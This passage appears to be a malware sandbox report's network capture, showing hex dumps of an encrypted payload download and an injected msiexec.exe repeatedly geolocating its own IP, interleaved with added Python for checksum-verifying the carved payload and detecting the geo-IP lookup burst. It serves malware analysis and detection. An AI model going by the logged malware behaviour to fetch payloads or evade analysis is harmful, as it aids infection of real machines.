    Data Ascii: F<5e?&1zdL+6_*P=<>y*4muGI&:JuW},nG`?C3WP]6o~A5_+._9GF;\,y~;9("Jr~$6kBZlEH1b&bfv.rI>}5bV-f0S`%aZX?'e=
2025-02-20 19:02:29 UTC | 1390 bytes | IN | Data Raw: 1a 93 3b 49 25 68 a6 67 6c f6 58 ac ca 0b d9 27 90 a7 c6 b3 6a ca c2 93 5e 16 1a ca 5a 78 76 16 98 1c 75 13 35 f1 fd 72 1a 54 18 a1 95 2e cb fd 52 18 99 76 2b 37 e3 f3 69 29 75 03 ce f4 5a 47 de fa 1a 7f 30 b9 3f 1b 91 f4 06 b6 7f a3 53 21 f1 2b 82 7c 9d 8a 94 0f 07 94 46 a2 2c 57 da 39 8a 01 d2 61 75 fa 45 75 36 5f f2 96 09 71 a5 24 2f 66 85 9e af f1 fc 94 34 72 bf 9d ea f6 67 78 10 08 4f 37 a8 f1 8c e9 11 4e 75 0d a0 b5 e2 c1 67 50 a7 97 26 6c 2a 7e 0f 87 84 64 ae 7e 0f 01 c5 a9 f3 31 5e 90 33 ce 47 a7 8b f7 50 27 08 27 7d 4b bd 97 d1 db 35 2f c6 43 8e 1f e4 33 ff 94 5f 69 cd 00 16 5c 76 0d e5 6d b3 15 b6 d9 b7 8f 2c 8d cf 37 d6 56 1c a7 c7 a1 99 38 87 c4 75 c4 28 a6 6a 0e 38 34 a5 dc 99 60 c5 db 64 56 4c e5 32 1b e0 ba 42 32 6c ee 20 a7 80 fd a0 e4 5e
    Data Ascii: ;I%hglX'j^Zxvu5rT.Rv+7i)uZG0?S!+|F,W9auEu6_q$/f4rgxO7NugP&l*~d~1^3GP''}K5/C3_i\vm,7V8u(j84`dVL2B2l ^
2025-02-20 19:02:29 UTC | 1390 bytes | IN | Data Raw: 01 ba c8 aa fd c3 4d e1 1f b4 4b 62 f6 fb 19 44 96 8b 39 d3 cf ce bb 3e b3 72 b5 49 1c 03 c8 9f 36 bc 04 b2 db d7 3c 07 a2 43 c7 4e cc f8 7c 6c a0 f7 41 40 e3 37 26 4b 98 11 6f b7 61 ce 88 41 87 d8 0a 57 32 fc ab 2e 7d ea be 12 b9 f3 a1 af 90 ec 5f 68 0c aa 61 d3 07 71 6d 16 fb 74 bb fa 78 c0 a9 f3 cd 83 6b 6b da c8 93 4e 0e 74 13 d3 e6 7c 09 08 0d 6f 02 3f d7 e8 6b c8 3d 77 ff 8a 2e c1 ec 43 1f 7b 9b 2b 37 e8 d6 6e 43 13 cc ce 84 f2 71 d2 c3 b7 10 4b b3 9d 34 9a 9c 42 a3 0c 78 f1 04 e2 46 a6 6d 81 e1 4b 2a 1d ec 2c b0 3d 3b 17 b1 91 7f c4 61 64 e4 45 37 36 5f f2 34 3d 76 b8 ca 3b 66 ff 3c 87 be 3f 94 3e 79 97 2a fc de 15 7f 7f 5e 4f 17 a2 f1 84 e3 12 37 73 27 b1 85 f7 4c f0 57 a7 96 23 7a 58 fb 04 f9 e8 4c ec 7a 60 e9 67 8c ee 3d 41 91 33 ba f3 aa 10 85
    Data Ascii: MKbD9>rI6<CN|lA@7&KoaAW2.}_haqmtxkkNt|o?k=w.C{+7nCqK4BxFmK*,=;adE76_4=v;f<?>y*^O7s'LW#zXLz`g=A3
2025-02-20 19:02:29 UTC | 1390 bytes | IN | Data Raw: 29 34 3e cf 4d c0 cf b3 99 34 b3 6a 6a 7f bb 9c ff 17 f7 61 b1 d3 d4 07 cf dc 9c bf 4f 73 3c f0 6c 51 a6 c0 5d 5d 96 0d 3c 9b f7 8d 46 39 4f f8 e9 4b 50 ca ec 21 b0 ad 3a f6 79 4d e0 e3 88 9a 22 92 e1 ff e1 d5 83 43 4b 26 3b ac 89 ea a5 7e 50 9f 22 07 18 ed 9a f6 96 42 eb 6f 07 7a 53 5c c3 19 4e 81 3f 6e f8 ac ff c8 40 ee d0 90 56 10 14 d9 9f 42 0f 37 86 7c e2 2a 0d c1 f6 9d 70 dd f8 06 2b aa f7 41 40 fc 28 3f dd 83 1f 07 77 11 a1 54 41 87 d5 65 be 68 fc a1 29 65 f5 c7 46 37 9a c4 e2 89 fd 4d 1a 90 d4 cd a3 68 ac 6d c8 fd 74 a3 ce 6e d0 48 9b a7 ec b9 6b 06 1c 80 7a 3e 2f ca d3 ec 65 1e 12 34 17 13 26 cb 24 1d 40 54 18 a1 8a 2e b5 de 52 05 10 45 be 35 e2 a6 69 73 ff 16 ce 8e ee 9c c8 c1 a9 6e 35 8a 4b 3c 89 86 2d 96 7f d3 f5 76 89 45 ba 0c 8b a6 b5 2a 1d
    Data Ascii: )4>M4jjaOs<lQ]]<F9OKP!:yM"CK&;~P"BozS\N?n@VB7|*p+A@(?wTAeh)eF7MhmtnHkz>/e4&$@T.RE5isn5K<-vE*
2025-02-20 19:02:29 UTC | 1390 bytes | IN | Data Raw: 70 19 16 03 a3 57 1b e2 ba 85 d9 72 41 97 e0 56 b2 a9 4c b2 f0 bc 6b 0d fa b8 50 91 3c f6 e7 d2 5b dc 50 40 b8 fd 6f 8e 44 0d c9 2a 78 6a 80 d1 3f e7 3b e5 37 ab 8e 7c 1c 32 01 69 dd 22 d1 73 95 18 7a f0 61 80 63 b7 65 8b 11 3b 49 34 bb a0 c0 5e 67 6c 34 3a e1 07 1d ba b8 3b 20 82 56 76 c3 bb 96 e6 43 73 49 d3 d2 df 0d 16 ae cb af 4f 03 2d 79 6c 51 a8 b2 cf 21 d4 7d 2a b7 0a ce 46 33 5d 75 56 58 71 d1 a2 a7 7e ad 30 f6 79 4d e0 e3 88 9a 22 92 e1 ff e1 d5 83 43 4b 26 3b ac 89 ea a5 7e 50 9f 22 07 18 ed 9a f6 96 42 eb 6f 07 7a 53 5c c3 19 4e 81 3f 6e f8 ac ff c8 40 ee d0 90 56 10 14 d9 9f 42 0f 37 86 7c e2 2a 0d c1 f6 9d 70 dd f8 06 2b aa f7 41 40 e3 0d 2c de ab 75 68 b6 34 b7 2c 06 90 d2 7a dd 4d eb 83 92 6c fd db ec 9c eb d9 e9 86 fd 37 b8 bc a2 1f 9b 68
    Data Ascii: pWrAVLkP<[P@oD*xj?;7|2i"szace;I4^gl4:; VvCsIO-ylQ!}*F3]uVXq~0yM"CK&;~P"BozS\N?n@VB7|*p+A@,uh4,zMl7h
2025-02-20 19:02:29 UTC | 1390 bytes | IN | Data Raw: c1 1b a1 9a a3 d6 f4 00 21 d9 df 10 37 48 0c 12 d3 ed f7 ef 9b 0b 17 63 6e b9 ee 51 c0 ba c5 dd 56 63 7b aa 46 d8 98 3a 6c 78 53 12 94 09 5c 3b f0 44 e0 89 6d bd 61 6c 4d b0 59 6d cf aa 5d 37 f4 0f 81 a5 cd 77 9e 32 9d e8 33 8b 82 f5 80 5c 04 54 7b 46 1f 75 88 dc 86 6b 40 95 83 fe b6 94 81 ea 84 e9 ae 3e 41 e2 94 52 af df ab 0a 2e 2d f6 9d 03 ac c6 22 2b c5 2e 1f 2c 66 7a d8 26 1d 19 a8 a6 35 f6 21 84 c1 cf a3 1b 62 5d 7f 76 d9 0a 9c 5b dc 12 08 f3 02 35 01 c4 c7 a3 52 31 26 e1 aa bf db 4b 31 15 34 3a e3 74 09 cf b9 31 33 b6 00 73 c3 bb 98 87 f6 71 61 c1 c4 f7 84 c8 ae c1 b9 b1 02 40 5f 7d 43 80 cc 4b 32 c3 62 f6 9f 89 c4 46 39 60 80 57 5a 41 d6 ec 54 b0 ad 3a f6 51 06 f1 9d bc 87 af d7 c9 34 e0 f0 9f 5e ae 30 3b d6 2b de a3 28 dc 9f 22 09 c4 f3 82 84 c7
    Data Ascii: !7HcnQVc{F:lxS\;DmalMYm]7w23\T{Fuk@>AR.-"+.,fz&5!b]v[5R1&K14:t13sqa@_}CK2bF9`WZAT:Q4^0;+("
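The response headers above give everything needed to confirm that a payload carved from the capture is the complete, unmodified knRcZfRKst249.bin before it is handed to a decryptor or a second sandbox: Content-Length: 278080 and X-Goog-Hash: crc32c=XnXuZg==, where Google's UploadServer encodes the big-endian CRC32C of the object in base64. The following is an added example, not part of the Joe Sandbox report or of the sample's code: it implements CRC32C (Castagnoli polynomial) and the header check. The payload "123456789" and its hash are constructed test data; the header value from the report is only parsed, because the 278080-byte body is not reproduced on this page.

```python
import base64
import struct

# CRC32C (Castagnoli): reflected polynomial 0x82F63B78, init and xorout 0xFFFFFFFF.
# This is the checksum Google Cloud Storage reports in X-Goog-Hash: crc32c=<base64>,
# with the 32-bit value serialised big-endian before base64 encoding.
_POLY = 0x82F63B78
_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ _POLY if _c & 1 else _c >> 1
    _TABLE.append(_c)


def crc32c(data: bytes, crc: int = 0) -> int:
    """CRC32C of data. To checksum a stream chunk by chunk, pass the previous
    return value as `crc`; the final value equals the one-shot CRC."""
    crc ^= 0xFFFFFFFF                      # undo xorout / apply init
    for b in data:
        crc = _TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def parse_goog_hash(header_value: str) -> dict:
    """Parse 'crc32c=XnXuZg==' (optionally ',md5=...') into {'crc32c': int, 'md5': bytes}."""
    out = {}
    for item in header_value.split(","):
        name, _, b64 = item.strip().partition("=")   # split on the FIRST '=' only
        raw = base64.b64decode(b64)
        out[name] = struct.unpack(">I", raw)[0] if name == "crc32c" else raw
    return out


def verify_download(payload: bytes, headers: dict) -> tuple:
    """Return (ok, computed_crc, expected_crc).

    A truncated or tampered body fails either the length check or the CRC;
    note that CRC32C is an integrity check against transport damage, not an
    authenticity check, so a mismatch only tells you the carve is wrong."""
    expected_len = int(headers["Content-Length"])
    expected = parse_goog_hash(headers["X-Goog-Hash"])["crc32c"]
    computed = crc32c(payload)
    return (len(payload) == expected_len and computed == expected, computed, expected)


if __name__ == "__main__":
    # The header value seen in the report above; only parsed here.
    print("expected CRC32C from report: 0x%08X" % parse_goog_hash("crc32c=XnXuZg==")["crc32c"])
    # Constructed payload and matching header (CRC-32C check value of "123456789").
    ok, got, want = verify_download(b"123456789",
                                    {"Content-Length": "9", "X-Goog-Hash": "crc32c=4waSgw=="})
    print("constructed sample verifies:", ok, "0x%08X" % got, "0x%08X" % want)
```

In practice the payload would be read from the reassembled TCP stream (for example a follow-stream export from Wireshark or a `tcpflow` output file) and fed through `crc32c` in chunks; the value must equal 0x5E75EE66, which is what the report's crc32c=XnXuZg== decodes to.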


Session ID: 2
Source IP: 192.168.2.7   Source Port: 49978
Destination IP: 104.21.32.144   Destination Port: 443
PID: 8180   Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:32 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-02-20 19:02:32 UTC | 866 bytes | IN | HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 19:02:32 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 309920
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2F9K%2FInSWnKesd451Cr26Y%2BFxhy8eZ%2FyiiEvaXnHZivk2JD8n3fPUmG9oak%2FkNlzKBBZ9GWpEgAuit5BeGZdP1tfNcYk%2FdxBsb%2FSY6i%2FBNNSu52s0TMOPLr9nq2sYtg7xIbLgwn%2B"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9150c063acb0c327-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1641&min_rtt=1634&rtt_var=627&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1723730&cwnd=215&unsent_bytes=0&cid=dc2fd6939ebd701d&ts=152&x=0"
2025-02-20 19:02:32 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 3
Source IP: 192.168.2.7   Source Port: 49979
Destination IP: 104.21.32.144   Destination Port: 443
PID: 8180   Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:33 UTC | 61 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-02-20 19:02:33 UTC | 854 bytes | IN | HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 19:02:33 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 309921
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QiJv%2FnTPnwiypFByxtbYR9sVNS%2B3TbPDKxKkOee0N120gWAOIIjnzbydaRETEH8xumJq4ourdCUxOAa7SouH0hTHLd4kmwfrUYH94%2FYv00dgaFBmfzVm5uPumEHaGEilpXnZ6FZm"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9150c0690c184344-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1671&rtt_var=641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1686886&cwnd=137&unsent_bytes=0&cid=83a4e92e1b00e6e4&ts=170&x=0"
2025-02-20 19:02:33 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 4
Source IP: 192.168.2.7   Source Port: 49981
Destination IP: 104.21.32.144   Destination Port: 443
PID: 8180   Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:34 UTC | 85 bytes | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-02-20 19:02:34 UTC | 850 bytes | IN | HTTP/1.1 200 OK
    Date: Thu, 20 Feb 2025 19:02:34 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 309922
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLZaMAfy8NIQ7EvXOirffFPPJwVcjzVgg7SlPuaTKIos5m0lNbdNzkjlPsVvv3A67BdLqKtmjQLne8cIbXoY7NfagenB4o94JIG67V%2BWrY9cDhd1VdsptSyuXpxJMs5hcOhr4ExM"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 9150c0715fec4344-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1714&rtt_var=648&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1682027&cwnd=137&unsent_bytes=0&cid=046bd5d80ffc8665&ts=156&x=0"
2025-02-20 19:02:34 UTC | 362 bytes | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo
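Sessions 2 to 4 above are the same request three times in three seconds: the injected msiexec.exe asks reallyfreegeoip.org for the country of its own public IP with no User-Agent header at all, which is what the report's "HTTP GET or POST without a user agent", "May check the online IP address of the machine" and "Tries to detect the country of the analysis system" signatures are keyed on. A practitioner turning this into a detection wants each of those indicators scored separately, plus the burst. The following detector is an added example, not part of the Joe Sandbox report and not a rule from any IDS ruleset: it runs over sessions constructed to mirror the three above (same request lines, host, process and timestamps) plus one invented benign browser request for contrast.

```python
import re
from datetime import datetime

# Sessions constructed for this example. Sessions 2-4 copy the request lines,
# host, process and timestamps from the report above; session 9 is invented
# (a normal browser request) so that the detector has something to pass.
SESSIONS = [
    {"id": 2, "ts": "2025-02-20 19:02:32", "process": r"C:\Windows\SysWOW64\msiexec.exe",
     "request": "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n"},
    {"id": 3, "ts": "2025-02-20 19:02:33", "process": r"C:\Windows\SysWOW64\msiexec.exe",
     "request": "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\n\r\n"},
    {"id": 4, "ts": "2025-02-20 19:02:34", "process": r"C:\Windows\SysWOW64\msiexec.exe",
     "request": "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\nConnection: Keep-Alive\r\n\r\n"},
    {"id": 9, "ts": "2025-02-20 19:05:00", "process": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "request": "GET /index.html HTTP/1.1\r\nHost: example.org\r\nUser-Agent: Mozilla/5.0\r\n\r\n"},
]

GEOIP_HOSTS = {"reallyfreegeoip.org"}   # the lookup service seen in the report
NO_HTTP_EXPECTED = {"msiexec.exe"}       # the injected host process seen in the report
IP_PATH = re.compile(r"^/xml/(\d{1,3}(?:\.\d{1,3}){3})$")   # reallyfreegeoip's /xml/<ip> API


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, {lowercased header: value})."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, path, _version = head[0].split(" ", 2)
    headers = {}
    for line in head[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify(session):
    """Indicators tripped by one session; an empty list means nothing suspicious."""
    _method, path, headers = parse_request(session["request"])
    exe = session["process"].rsplit("\\", 1)[-1].lower()
    reasons = []
    if "user-agent" not in headers:
        reasons.append("no User-Agent header")
    host = headers.get("host", "")
    if host in GEOIP_HOSTS:
        reasons.append("geo-IP lookup via " + host)
    m = IP_PATH.match(path)
    if m:
        reasons.append("looks up public IP " + m.group(1))
    if exe in NO_HTTP_EXPECTED:
        reasons.append("HTTP client is " + exe)
    return reasons


def triage(sessions, window_s=10, min_hits=3):
    """Per-session indicators, plus a burst indicator when the same process
    repeats the same /xml/<ip> lookup at least min_hits times within window_s."""
    result = {s["id"]: classify(s) for s in sessions}
    by_key = {}
    for s in sessions:
        path = parse_request(s["request"])[1]
        if IP_PATH.match(path):
            by_key.setdefault((s["process"], path), []).append(s)
    for hits in by_key.values():
        hits.sort(key=lambda s: s["ts"])
        first = datetime.strptime(hits[0]["ts"], "%Y-%m-%d %H:%M:%S")
        last = datetime.strptime(hits[-1]["ts"], "%Y-%m-%d %H:%M:%S")
        span = (last - first).total_seconds()
        if len(hits) >= min_hits and span <= window_s:
            for s in hits:
                result[s["id"]].append("%d identical lookups in %ds" % (len(hits), span))
    return result


if __name__ == "__main__":
    for sid, reasons in triage(SESSIONS).items():
        print("session", sid, "->", "; ".join(reasons) if reasons else "clean")
```

The per-session indicators are deliberately kept separate rather than folded into one score: a missing User-Agent on its own is common in legitimate tooling, and a single geo-IP lookup is what many updaters do, but all four together from msiexec.exe, repeated every second, is the pattern the report shows. The process name is only available when the capture is correlated with process telemetry (as the sandbox does with the PID column); on a network sensor without that, drop the NO_HTTP_EXPECTED check and rely on the other three plus the burst.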


Session ID: 5
Source IP: 192.168.2.7
Source Port: 49983
Destination IP: 104.21.32.14
Destination Port: 443
PID: 8180
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-02-20 19:02:35 UTC | 858 | IN | HTTP/1.1 200 OK
  Date: Thu, 20 Feb 2025 19:02:35 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 309924
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Mon, 17 Feb 2025 04:57:11 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoyMM%2Fh7sQD7j%2FSjjqYnuN2rKUxKJ3%2FwxI0qI%2BZ56LBJerOd0ILhBoKSTuypVmVunAH7n4gk66wJerZD0kku4PkzsaLgU2uNVKWPhfR1VZRb%2F7kT5WnVFpyZX66wcgS3crS97SFY"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9150c0798b7572b9-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1807&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=233&unsent_bytes=0&cid=282c1b247ce290a7&ts=165&x=0"
2025-02-20 19:02:35 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 6
Source IP: 192.168.2.7
Source Port: 49985
Destination IP: 104.21.32.14
Destination Port: 443
PID: 8180
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:36 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
2025-02-20 19:02:37 UTC | 860 | IN | HTTP/1.1 200 OK
  Date: Thu, 20 Feb 2025 19:02:37 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 309925
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Mon, 17 Feb 2025 04:57:11 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zBQX%2BR0YvW%2BbVu6Fn4VhjB%2B7VsJ%2BmTLCauaHlJbu9m3iINEKkETjzsPcxer6YDIIj1ZTJS97BbkFeQgy8bXfM2XTEPl%2B3WmG6ZJdXwVDLUvzIlGoTrlNSUZBeYnaFlj4x1oobch%2B"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9150c0819eda1875-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1768&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1642294&cwnd=183&unsent_bytes=0&cid=5bb163fa3071e967&ts=149&x=0"
2025-02-20 19:02:37 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 7
Source IP: 192.168.2.7
Source Port: 49987
Destination IP: 104.21.32.14
Destination Port: 443
PID: 8180
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:38 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
2025-02-20 19:02:38 UTC | 854 | IN | HTTP/1.1 200 OK
  Date: Thu, 20 Feb 2025 19:02:38 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 309926
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Mon, 17 Feb 2025 04:57:11 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RRE4ZWWDSn6m976kfLQc2WKsH%2Bk7GcAFHMFQliKkgssH7gluHC7ZWjJYyXjUWcLUv0dQqAOqxwEV%2BoaAgpEAzH2LD84nsV5H1GQZeegGFef%2F63LYmTbkdX87qzTDWg790uQYuizs"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 9150c089dd87c327-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1584&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1788120&cwnd=215&unsent_bytes=0&cid=ba7626ac2d1fdfd1&ts=164&x=0"
2025-02-20 19:02:38 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 8
Source IP: 192.168.2.7
Source Port: 49989
Destination IP: 104.21.32.14
Destination Port: 443
PID: 8180
Process: C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2025-02-20 19:02:39 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
  Connection: Keep-Alive
2025-02-20 19:02:39 UTC | 854 | IN | HTTP/1.1 200 OK
  Date: Thu, 20 Feb 2025 19:02:39 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 309928
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Mon, 17 Feb 2025 04:57:11 GMT
